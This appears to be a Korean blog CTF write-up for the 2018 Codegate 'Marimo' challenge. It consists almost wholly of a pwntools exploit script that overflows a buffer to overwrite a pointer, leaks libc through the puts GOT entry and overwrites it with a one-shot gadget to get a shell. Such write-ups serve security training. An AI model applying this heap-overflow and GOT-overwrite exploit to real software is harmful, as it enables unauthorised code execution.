9oat's LAB
[2018 Codegate] Marimo 본문
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 | from pwn import * def smtm(s): s.send('show me the marimo\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") def mod(s,pay,sel): s.send('V\n') s.recvuntil(">>") s.send(sel) s.recvuntil(">>") s.send('M\n') s.recvuntil(">>") s.send(pay+'\n') s.recvuntil(">>") s.send('B\n') s.recvuntil(">>") def view(s,sel): s.send('V\n') s.recvuntil(">>") s.send(sel) s.recvuntil("name : ") res = hex(u64((s.recvn(7))+"\x00")) s.send('B\n') s.recvuntil(">>") return res b = '/home/goat/PROB/2018 Codegate/marimo' elf = ELF(b) s = process(b) puts_got = elf.got['puts'] dummy = 'A' * 56 leak = dummy + p64(puts_got) pay = dummy + p64(0x00) + p64(puts_got) s.recvuntil(">>") smtm(s) smtm(s) sleep(3) mod(s,leak,'0\n') # leak puts' libc addr puts_addr = int((view(s,'1\n').split('0xa')[1]),16) libc_base = puts_addr - 0x6f690 one_shot = libc_base + 0x45216 print '[+] Libc Base : ',hex(libc_base) print '[+] OneShotGadget : ',hex(one_shot) mod(s,pay,'0\n') # overwrite bowl[1][2](profile -> *puts' got s.recvuntil(">>") s.send('V\n') s.recvuntil(">>") s.send('1\n') s.recvuntil("name : ") s.send('M\n') s.recvuntil(">>") s.send(p64(one_shot)) # GOT Overwriting puts -> OneShotGadget s.recvuntil(">>") s.interactive() | cs |
'Write Up > CTFs' 카테고리의 다른 글
| [2018 Codegate] Baskin (0) | 2018.07.11 |
|---|---|
| [2017 HUST] Withdraw (0) | 2018.07.11 |
| [PlaidCTF] ropasaurusrex (0) | 2017.07.05 |
Comments